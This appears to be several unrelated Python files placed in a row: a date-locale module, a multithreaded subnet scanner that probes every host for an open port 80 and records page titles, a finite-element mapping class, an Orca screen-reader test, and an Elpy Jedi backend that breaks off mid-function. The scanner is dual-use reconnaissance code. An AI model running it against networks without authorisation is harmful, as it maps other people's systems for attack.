""" Locale dependant formatting and parsing. XXX This module still has prototype status and is undocumented. XXX Check the spelling. XXX Check the string format. Copyright (c) 1998-2000, Marc-Andre Lemburg; mailto:[email protected] Copyright (c) 2000-2001, eGenix.com Software GmbH; mailto:[email protected] See the documentation for further information on copyrights, or contact the author. All Rights Reserved. """ def _make_dict(*names): """ Helper to create a dictionary mapping indices to names and names to indices. """ d = {} for i in range(len(names)): d[names[i]] = i d[i] = names[i] return d class _TimeLocale: """ Base class for locale dependend formatting and parsing. """ # Examples: Weekday = _make_dict('Monday','Tuesday','Wednesday','Thursday','Friday', 'Saturday','Sunday') Month = _make_dict(None, 'January','February','March','April','May','June', 'July','August','September','October','November','December') # Instance variables MonthNames = () WeekdayNames = () def __init__(self): """ Init. the instance variables. """ l = [] for i in range(1,13): l.append(self.Month[i]) self.MonthNames = tuple(l) l = [] for i in range(7): l.append(self.Weekday[i]) self.WeekdayNames = tuple(l) def str(self,d): """str(datetime) Return the given DateTime instance formatted according to the locale's convention. Timezone information is not presented. """ return '%s %02i %s %04i %02i:%02i:%02i' % ( self.Weekday[d.day_of_week], d.day,self.Month[d.month],d.year, d.hour,d.minute,d.second) # Alias ctime = str # Singletons that implement the specific methods. class English(_TimeLocale): Weekday = _make_dict('Monday','Tuesday','Wednesday','Thursday','Friday', 'Saturday','Sunday') Month = _make_dict(None, 'January','February','March','April','May','June', 'July','August','September','October','November','December') English = English() class German(_TimeLocale): Weekday = _make_dict('Montag','Dienstag','Mittwoch','Donnerstag', 'Freitag','Samstag','Sonntag') Month = _make_dict(None, 'Januar','Februar','März','April','Mai','Juni', 'Juli','August','September','Oktober','November','Dezember') German = German() class French(_TimeLocale): Weekday = _make_dict('lundi','mardi','mercredi','jeudi', 'vendredi','samedi','dimanche') Month = _make_dict(None, 'janvier','février','mars','avril','mai','juin', 'juillet','août','septembre','octobre','novembre','décembre') French = French() class Spanish(_TimeLocale): Weekday = _make_dict('lunes','martes','miercoles','jueves','viernes', 'sabado','domingo') Month = _make_dict(None, 'enero','febrero','marzo','abril','mayo','junio', 'julio','agosto','septiembre','octubre','noviembre','diciembre') Spanish = Spanish() class Portuguese(_TimeLocale): Weekday = _make_dict('primeira feira', 'segunda feira','terceira feira', 'cuarta feira','quinta feira','sabado','domingo') Month = _make_dict(None, 'janeiro','fevereiro','mar','abril','maio','junho', 'julho','agosto','septembro','outubro','novembro','dezembro') Portuguese = Portuguese() ### def _test(): import DateTime d = DateTime.now() for lang in (English,German,French,Spanish,Portuguese): print lang.__class__.__name__,':',lang.ctime(d) if __name__ == '__main__': _test()
import socket import requests from lxml.html import fromstring import datetime import sys import ipaddress import threading import os BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[1;94m', '\033[1;91m', '\33[1;97m', '\33[1;93m', '\033[1;35m', '\033[1;32m', '\033[0m' class ThreadManager(object): i = 0 def __init__(self, ipList): self.allIps = ipList self.size = len(ipList) def getNextIp(self): if not (self.i >= self.size - 1): ip = self.allIps[self.i] self.i += 1 return ip return 0 def getID(self): return self.i + 1 def coreOptions(): options = [["network", "IP range to scan", ""], ["port-timeout", "Timeout (in sec) for port 80.", "0.3"], ["title-timeout", "Timeout (in sec) for title resolve.", "3"], ["threads", "Number of threads to run.", "50"], ["verbose", "Show verbose output.", "true"]] return options def createIPList(network): net4 = ipaddress.ip_network(network) ipList = [] for x in net4.hosts(): ipList.append(x) return ipList def print1(data): if verbose: print("\033[K" + data) def checkServer(address, port): s = socket.socket() s.settimeout(float(portTimeout)) try: s.connect((address, port)) s.close() return True except socket.error: s.close() return False except: s.close() return "FAIL" def getHTTP(address, port): code = None title = None try: r = requests.get("http://" + address, timeout=float(titleTimeout), allow_redirects=True) except: return False try: code = r.status_code except: pass try: tree = fromstring(r.content) title = tree.findtext('.//title') except: pass return [title, code] def writeToFile(line): file = open(fileName, "a") file.write(line) file.close() def restart_line(): sys.stdout.write('\r') sys.stdout.flush() def statusWidget(): sys.stdout.write(GREEN + "[" + status + "] " + YELLOW + str(threadManager.getID()) + GREEN + " / " + YELLOW + str( allIPs) + GREEN + " hosts done." + END) restart_line() sys.stdout.flush() def scan(i): global status global openPorts global done while True: if stop: sys.exit() ip = threadManager.getNextIp() if ip == 0: break status = (threadManager.getID() / allIPs) * 100 status = format(round(status, 2)) status = str(status) + "%" stringIP = str(ip) isUp = checkServer(stringIP, port) if isUp != "FAIL": if isUp: openPorts = openPorts + 1 print1(GREEN + "[+] Port 80 is open on '" + stringIP + "'" + END) http = getHTTP(stringIP, 80) if not http: print1(YELLOW + "[!] Failed to get the HTTP response of '" + stringIP + "'" + END) title = "NO-TITLE" code = "NO-CODE" else: title = str(http[0]) code = str(http[1]) if code is not None: print1(GREEN + "[+] Response code of '" + stringIP + "': '" + code + "'" + END) else: print1(YELLOW + "[!] Failed to get the response code of '" + stringIP + "'" + YELLOW) code = "NO-CODE" if title is not None: title = title.replace("\n", "") try: print1(GREEN + "[+] Title of '" + stringIP + "': '" + title + "'" + END) except: print1(YELLOW + "[!] Failed to print title of '" + stringIP + "'" + END) title = "NO-TITLE" else: print1(YELLOW + "[!] Failed to get title of '" + stringIP + "'" + YELLOW) title = "NO-TITLE" logLine = stringIP + " - " + "80 OPEN" + " - " + code + " - " + title + "\n" logLines.append(logLine) elif not isUp: print1(RED + "[-] Port 80 is closed on '" + stringIP + "'" + END) else: print1(RED + "[!] Failed connecting to '" + stringIP + "'" + END) done = done + 1 def core(moduleOptions): print( "\n" + GREEN + "HTTP module by @xdavidhu. Scanning subnet '" + YELLOW + moduleOptions[0][2] + GREEN + "'...\n") global status global fileName global allIPs global portTimeout global titleTimeout global ips global threadCount global done global verbose global stop global port global openPorts global logLines global threadManager logLines = [] stop = False done = 0 portTimeout = moduleOptions[1][2] titleTimeout = moduleOptions[2][2] network = moduleOptions[0][2] threadCount = int(moduleOptions[3][2]) verbose = moduleOptions[4][2] if verbose == "true": verbose = True else: verbose = False try: ipList = createIPList(network) allIPs = len(ipList) if allIPs == 0: raise Exception except: print(RED + "[!] Invalid subnet. Exiting...\n") return threadManager = ThreadManager(ipList) i = datetime.datetime.now() i = str(i).replace(" ", "_") i = str(i).replace(":", "-") script_path = os.path.dirname(os.path.realpath(__file__)) script_path = script_path.replace("modules", "") if not os.path.exists(script_path + "logs"): os.makedirs(script_path + "logs") fileName = script_path + "logs/log-http-portSpider-" + i + ".log" file = open(fileName, 'w') file.write("subnet: " + network + "\n") file.close() port = 80 openPorts = 0 threads = [] for i in range(threadCount): i -= 1 t = threading.Thread(target=scan, args=(i,)) t.daemon = True threads.append(t) t.start() try: while True: if done == threadCount and threadManager.getID() == allIPs: break statusWidget() except KeyboardInterrupt: stop = True verbose = False print("\n" + RED + "[I] Stopping..." + END) stop = True verbose = False for logLine in logLines: try: writeToFile(logLine) except: writeToFile("WRITING-ERROR") print("\n\n" + GREEN + "[I] HTTP module done. Results saved to '" + YELLOW + fileName + GREEN + "'.\n")
""" Reference mappings for isogeometric analysis. """ import numpy as nm from sfepy.discrete.common.mappings import Mapping from sfepy.discrete.common.extmods.mappings import CMapping import sfepy.discrete.iga.extmods.igac as iga class IGMapping(Mapping): """ Reference mapping for isogeometric analysis based on Bezier extraction. Parameters ---------- domain : IGDomain instance The mapping domain. cells : array The mapping region cells. (All domain cells required.) nurbs : NurbsPatch instance, optional If given, the `nurbs` is used instead of `domain.nurbs`. The `nurbs` has to be obtained by degree elevation of `domain.nurbs`. """ def __init__(self, domain, cells, nurbs=None): self.domain = domain self.cells = cells self.nurbs = domain.nurbs if nurbs is None else nurbs self.v_shape = (len(cells), -1, self.domain.shape.dim) self.s_shape = (len(cells), -1, 1) def get_geometry(self): """ Return reference element geometry as a GeometryElement instance. """ return self.domain.gel def get_physical_qps(self, qp_coors): """ Get physical quadrature points corresponding to given reference Bezier element quadrature points. Returns ------- qps : array The physical quadrature points ordered element by element, i.e. with shape (n_el, n_qp, dim). """ nurbs = self.nurbs variable = nm.ones((nurbs.weights.shape[0], 1), dtype=nm.float64) qps, _, _ = iga.eval_variable_in_qp(variable, qp_coors, nurbs.cps, nurbs.weights, nurbs.degrees, nurbs.cs, nurbs.conn, self.cells) qps = qps.reshape(self.v_shape) return qps def get_mapping(self, qp_coors, weights): """ Get the mapping for given quadrature points and weights. Returns ------- cmap : CMapping instance The reference mapping. Notes ----- Does not set total volume of the C mapping structure! """ nurbs = self.nurbs bfs, bfgs, dets = iga.eval_mapping_data_in_qp(qp_coors, nurbs.cps, nurbs.weights, nurbs.degrees, nurbs.cs, nurbs.conn, self.cells) # Weight Jacobians by quadrature point weights. dets = nm.abs(dets) * weights[None, :, None, None] # Cell volumes. volumes = dets.sum(axis=1)[..., None] cmap = CMapping(self.v_shape[0], qp_coors.shape[0], self.v_shape[2], bfs.shape[3], mode='volume', flag=1) cmap.bf[:] = bfs cmap.bfg[:] = bfgs cmap.det[:] = dets cmap.volume[:] = volumes return cmap
#!/usr/bin/python """Test of label guess for bugzilla's advanced search page.""" from macaroon.playback import * import utils sequence = MacroSequence() #sequence.append(WaitForDocLoad()) sequence.append(PauseAction(5000)) # Work around some new quirk in Gecko that causes this test to fail if # run via the test harness rather than manually. sequence.append(KeyComboAction("<Control>r")) sequence.append(PauseAction(3000)) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("<Shift>ISO_Left_Tab")) sequence.append(utils.AssertPresentationAction( "1. Shift Tab", ["BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "BRAILLE LINE: 'Summary: contains all of the words/strings combo box'", " VISIBLE: 'Summary: contains all of the wor', cursor=10", "SPEECH OUTPUT: 'Summary: contains all of the words/strings combo box.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "2. Tab", ["BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "SPEECH OUTPUT: 'entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "3. Tab", ["BRAILLE LINE: 'Search push button'", " VISIBLE: 'Search push button', cursor=1", "BRAILLE LINE: 'Browse mode'", " VISIBLE: 'Browse mode', cursor=0", "SPEECH OUTPUT: 'Search push button'", "SPEECH OUTPUT: 'Browse mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "4. Tab", ["BRAILLE LINE: 'Search push button'", " VISIBLE: 'Search push button', cursor=1", "BRAILLE LINE: 'Admin'", " VISIBLE: 'Admin', cursor=1", "BRAILLE LINE: 'Focus mode'", " VISIBLE: 'Focus mode', cursor=0", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Classification: multi-select List with 8 items'", "SPEECH OUTPUT: 'Admin.'", "SPEECH OUTPUT: 'Focus mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "5. Tab", ["BRAILLE LINE: 'Admin'", " VISIBLE: 'Admin', cursor=1", "BRAILLE LINE: 'accerciser'", " VISIBLE: 'accerciser', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Product: multi-select List with 379 items'", "SPEECH OUTPUT: 'accerciser.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "6. Tab", ["BRAILLE LINE: 'Component'", " VISIBLE: 'Component', cursor=1", "BRAILLE LINE: 'Browse mode'", " VISIBLE: 'Browse mode', cursor=0", "BRAILLE LINE: 'Component'", " VISIBLE: 'Component', cursor=1", "SPEECH OUTPUT: 'Component link.'", "SPEECH OUTPUT: 'Browse mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "7. Tab", ["BRAILLE LINE: 'abiscan'", " VISIBLE: 'abiscan', cursor=1", "BRAILLE LINE: 'Focus mode'", " VISIBLE: 'Focus mode', cursor=0", "SPEECH OUTPUT: 'Component: multi-select List with 1248 items'", "SPEECH OUTPUT: 'abiscan.'", "SPEECH OUTPUT: 'Focus mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "8. Tab", ["BRAILLE LINE: 'abiscan'", " VISIBLE: 'abiscan', cursor=1", "BRAILLE LINE: '0.0.1'", " VISIBLE: '0.0.1', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Version: multi-select List with 857 items'", "SPEECH OUTPUT: '0.0.1.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "9. Tab", ["BRAILLE LINE: '---'", " VISIBLE: '---', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Target Milestone: multi-select List with 555 items'", "SPEECH OUTPUT: '---.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "10. Tab", ["BRAILLE LINE: 'A Comment: contains the string combo box'", " VISIBLE: 'A Comment: contains the string c', cursor=12", "SPEECH OUTPUT: 'A Comment: contains the string combo box.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "11. Tab", ["BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "SPEECH OUTPUT: 'entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "12. Tab", ["BRAILLE LINE: 'Whiteboard: contains all of the words/strings combo box'", " VISIBLE: 'Whiteboard: contains all of the ', cursor=13", "SPEECH OUTPUT: 'Whiteboard: contains all of the words/strings combo box.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "13. Tab", ["BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "SPEECH OUTPUT: 'entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "14. Tab", ["BRAILLE LINE: 'Keywords'", " VISIBLE: 'Keywords', cursor=1", "BRAILLE LINE: 'Browse mode'", " VISIBLE: 'Browse mode', cursor=0", "BRAILLE LINE: 'Keywords'", " VISIBLE: 'Keywords', cursor=1", "SPEECH OUTPUT: 'Keywords link.'", "SPEECH OUTPUT: 'Browse mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "15. Tab", ["BRAILLE LINE: 'Keywords: contains all of the keywords combo box'", " VISIBLE: 'Keywords: contains all of the ke', cursor=11", "BRAILLE LINE: 'Focus mode'", " VISIBLE: 'Focus mode', cursor=0", "SPEECH OUTPUT: 'Keywords: contains all of the keywords combo box.'", "SPEECH OUTPUT: 'Focus mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "16. Tab", ["BRAILLE LINE: 'Keywords: contains all of the keywords combo box'", " VISIBLE: 'Keywords: contains all of the ke', cursor=11", "BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "SPEECH OUTPUT: 'entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "17. Tab", ["BRAILLE LINE: 'UNCONFIRMED'", " VISIBLE: 'UNCONFIRMED', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Status: multi-select List with 8 items'", "SPEECH OUTPUT: 'UNCONFIRMED.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "18. Tab", ["BRAILLE LINE: 'FIXED'", " VISIBLE: 'FIXED', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Resolution: multi-select List with 12 items'", "SPEECH OUTPUT: 'FIXED.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "19. Tab", ["BRAILLE LINE: 'blocker'", " VISIBLE: 'blocker', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Severity: multi-select List with 7 items'", "SPEECH OUTPUT: 'blocker.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "20. Tab", ["BRAILLE LINE: 'Immediate'", " VISIBLE: 'Immediate', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'Priority: multi-select List with 5 items'", "SPEECH OUTPUT: 'Immediate.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "21. Tab", ["BRAILLE LINE: 'All'", " VISIBLE: 'All', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'OS: multi-select List with 21 items'", "SPEECH OUTPUT: 'All.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "22. Tab", ["BRAILLE LINE: '<x> the bug assignee check box'", " VISIBLE: '<x> the bug assignee check box', cursor=1", "BRAILLE LINE: 'Browse mode'", " VISIBLE: 'Browse mode', cursor=0", "SPEECH OUTPUT: 'Email and Numbering panel'", "SPEECH OUTPUT: 'the bug assignee check box checked'", "SPEECH OUTPUT: 'Browse mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "23. Tab", ["BRAILLE LINE: '<x> the bug assignee check box'", " VISIBLE: '<x> the bug assignee check box', cursor=1", "BRAILLE LINE: '< > the reporter check box'", " VISIBLE: '< > the reporter check box', cursor=1", "SPEECH OUTPUT: 'the reporter check box not checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "24. Tab", ["BRAILLE LINE: '< > the QA contact check box'", " VISIBLE: '< > the QA contact check box', cursor=1", "SPEECH OUTPUT: 'the QA contact check box not checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "25. Tab", ["BRAILLE LINE: '< > a CC list member check box'", " VISIBLE: '< > a CC list member check box', cursor=1", "SPEECH OUTPUT: 'a CC list member check box not checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "26. Tab", ["BRAILLE LINE: '< > a commenter check box'", " VISIBLE: '< > a commenter check box', cursor=1", "SPEECH OUTPUT: 'a commenter check box not checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "27. Tab", ["BRAILLE LINE: 'contains combo box'", " VISIBLE: 'contains combo box', cursor=1", "BRAILLE LINE: 'Focus mode'", " VISIBLE: 'Focus mode', cursor=0", "SPEECH OUTPUT: 'contains combo box.'", "SPEECH OUTPUT: 'Focus mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "28. Tab", ["BRAILLE LINE: 'contains combo box'", " VISIBLE: 'contains combo box', cursor=1", "BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "SPEECH OUTPUT: 'entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "29. Tab", ["BRAILLE LINE: '<x> the bug assignee check box'", " VISIBLE: '<x> the bug assignee check box', cursor=1", "BRAILLE LINE: 'Browse mode'", " VISIBLE: 'Browse mode', cursor=0", "SPEECH OUTPUT: 'the bug assignee check box checked'", "SPEECH OUTPUT: 'Browse mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "30. Tab", ["BRAILLE LINE: '<x> the bug assignee check box'", " VISIBLE: '<x> the bug assignee check box', cursor=1", "BRAILLE LINE: '<x> the reporter check box'", " VISIBLE: '<x> the reporter check box', cursor=1", "SPEECH OUTPUT: 'the reporter check box checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "31. Tab", ["BRAILLE LINE: '<x> the QA contact check box'", " VISIBLE: '<x> the QA contact check box', cursor=1", "SPEECH OUTPUT: 'the QA contact check box checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "32. Tab", ["BRAILLE LINE: '<x> a CC list member check box'", " VISIBLE: '<x> a CC list member check box', cursor=1", "SPEECH OUTPUT: 'a CC list member check box checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "33. Tab", ["BRAILLE LINE: '< > a commenter check box'", " VISIBLE: '< > a commenter check box', cursor=1", "SPEECH OUTPUT: 'a commenter check box not checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "34. Tab", ["BRAILLE LINE: 'contains combo box'", " VISIBLE: 'contains combo box', cursor=1", "BRAILLE LINE: 'Focus mode'", " VISIBLE: 'Focus mode', cursor=0", "SPEECH OUTPUT: 'contains combo box.'", "SPEECH OUTPUT: 'Focus mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "35. Tab", ["BRAILLE LINE: 'contains combo box'", " VISIBLE: 'contains combo box', cursor=1", "BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "SPEECH OUTPUT: 'entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "36. Tab", ["BRAILLE LINE: 'Only include combo box'", " VISIBLE: 'Only include combo box', cursor=1", "SPEECH OUTPUT: 'Only include combo box.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "37. Tab", ["BRAILLE LINE: 'bugs numbered: $l'", " VISIBLE: 'bugs numbered: $l', cursor=16", "SPEECH OUTPUT: 'bugs numbered: entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "38. Tab", ["BRAILLE LINE: 'Only bugs changed between: $l'", " VISIBLE: 'Only bugs changed between: $l', cursor=28", "SPEECH OUTPUT: 'Bug Changes panel'", "SPEECH OUTPUT: 'List with 3 items'", "SPEECH OUTPUT: 'Only bugs changed between: entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "39. Tab", ["BRAILLE LINE: 'and Now $l'", " VISIBLE: 'and Now $l', cursor=8", "BRAILLE LINE: 'and Now $l'", " VISIBLE: 'and Now $l', cursor=8", "SPEECH OUTPUT: 'and entry Now selected'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "40. Tab", ["BRAILLE LINE: '[Bug creation]'", " VISIBLE: '[Bug creation]', cursor=1", "SPEECH OUTPUT: 'where one or more of the following changed: multi-select List with 26 items'", "SPEECH OUTPUT: '[Bug creation].'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "41. Tab", ["BRAILLE LINE: 'and the new value was: $l'", " VISIBLE: 'and the new value was: $l', cursor=24", "SPEECH OUTPUT: 'and the new value was: entry'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "42. Tab", ["BRAILLE LINE: 'Unspecified'", " VISIBLE: 'Unspecified', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'GNOME version: multi-select List with 14 items'", "SPEECH OUTPUT: 'Unspecified.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "43. Tab", ["BRAILLE LINE: 'Unspecified'", " VISIBLE: 'Unspecified', cursor=1", "SPEECH OUTPUT: 'table with 2 rows 1 column'", "SPEECH OUTPUT: 'GNOME target: multi-select List with 12 items'", "SPEECH OUTPUT: 'Unspecified.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "44. Tab", ["BRAILLE LINE: 'Sort results by: Reuse same sort as last time combo box'", " VISIBLE: 'Sort results by: Reuse same sort', cursor=18", "SPEECH OUTPUT: 'Sort results by: Reuse same sort as last time combo box.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "45. Tab", ["BRAILLE LINE: 'Search push button'", " VISIBLE: 'Search push button', cursor=1", "BRAILLE LINE: 'Browse mode'", " VISIBLE: 'Browse mode', cursor=0", "SPEECH OUTPUT: 'Search push button'", "SPEECH OUTPUT: 'Browse mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "46. Tab", ["BRAILLE LINE: 'Search push button'", " VISIBLE: 'Search push button', cursor=1", "BRAILLE LINE: '< > and remember these as my default search options check box'", " VISIBLE: '< > and remember these as my def', cursor=1", "SPEECH OUTPUT: 'and remember these as my default search options check box not checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "47. Tab", ["BRAILLE LINE: '< > Not (negate this whole chart) check box'", " VISIBLE: '< > Not \(negate this whole chart', cursor=1", "SPEECH OUTPUT: 'Not (negate this whole chart) check box not checked'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "48. Tab", ["BRAILLE LINE: '--- combo box'", " VISIBLE: '--- combo box', cursor=1", "BRAILLE LINE: 'Focus mode'", " VISIBLE: 'Focus mode', cursor=0", "SPEECH OUTPUT: '--- combo box.'", "SPEECH OUTPUT: 'Focus mode' voice=system"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "49. Tab", ["BRAILLE LINE: '--- combo box'", " VISIBLE: '--- combo box', cursor=1", "BRAILLE LINE: '--- combo box'", " VISIBLE: '--- combo box', cursor=1", "SPEECH OUTPUT: '--- combo box.'"])) sequence.append(utils.StartRecordingAction()) sequence.append(KeyComboAction("Tab")) sequence.append(utils.AssertPresentationAction( "50. Tab", ["BRAILLE LINE: ' $l'", " VISIBLE: ' $l', cursor=1", "SPEECH OUTPUT: 'entry'"])) sequence.append(utils.AssertionSummaryAction()) sequence.start()
"""Elpy backend using the Jedi library. This backend uses the Jedi library: https://github.com/davidhalter/jedi """ import sys import traceback import jedi from elpy import rpc class JediBackend(object): """The Jedi backend class. Implements the RPC calls we can pass on to Jedi. Documentation: http://jedi.jedidjah.ch/en/latest/docs/plugin-api.html """ name = "jedi" def __init__(self, project_root): self.project_root = project_root self.completions = {} sys.path.append(project_root) def rpc_get_completions(self, filename, source, offset): line, column = pos_to_linecol(source, offset) proposals = run_with_debug(jedi, 'completions', source=source, line=line, column=column, path=filename, encoding='utf-8') if proposals is None: return [] self.completions = dict((proposal.name, proposal) for proposal in proposals) return [{'name': proposal.name, 'suffix': proposal.complete, 'annotation': proposal.type, 'meta': proposal.description} for proposal in proposals] def rpc_get_completion_docstring(self, completion): proposal = self.completions.get(completion) if proposal is None: return None else: return proposal.docstring(fast=False) def rpc_get_completion_location(self, completion): proposal = self.completions.get(completion) if proposal is None: return None else: return (proposal.module_path, proposal.line) def rpc_get_docstring(self, filename, source, offset): line, column = pos_to_linecol(source, offset) try: locations = run_with_debug(jedi, 'goto_definitions', source=source, line=line, column=column, path=filename, encoding='utf-8', re_raise=jedi.NotFoundError) except jedi.NotFoundError: return None if locations: return ('Documentation for {0}:\n\n'.format( locations[-1].full_name) + locations[-1].docstring()) else: return None def rpc_get_definition(self, filename, source, offset): line, column = pos_to_linecol(source, offset) try: locations = run_with_debug(jedi, 'goto_definitions', source=source, line=line, column=column, path=filename, encoding='utf-8', re_raise=jedi.NotFoundError) except jedi.NotFoundError: return None # goto_definitions() can return silly stuff like __builtin__ # for int variables, so we fall back on goto() in those # cases. See issue #76. if ( locations and locations[0].module_path is None ): locations = run_with_debug(jedi, 'goto_assignments', source=source, line=line, column=column, path=filename, encoding='utf-8') if not locations: return None else: loc = locations[-1] try: if loc.module_path: if loc.module_path == filename: offset = linecol_to_pos(source, loc.line, loc.column) else: with open(loc.module_path) as f: offset = linecol_to_pos(f.read(), loc.line, loc.column) except IOError: return None return (loc.module_path, offset) def rpc_get_calltip(self, filename, source, offset): line, column = pos_to_linecol(source, offset) calls = run_with_debug(jedi, 'call_signatures', source=source, line=line, column=column, path=filename, encoding='utf-8') if calls: call = calls[0] else: call = None if not call: return None return {"name": call.name, "index": call.index, "params": [param.description for param in call.params]} def rpc_get_usages(self, filename, source, offset): """Return the uses of the symbol at offset. Returns a list of occurrences of the symbol, as dicts with the fields name, filename, and offset. """ line, column = pos_to_linecol(source, offset) try: uses = run_with_debug(jedi, 'usages', source=source, line=line, column=column, path=filename, 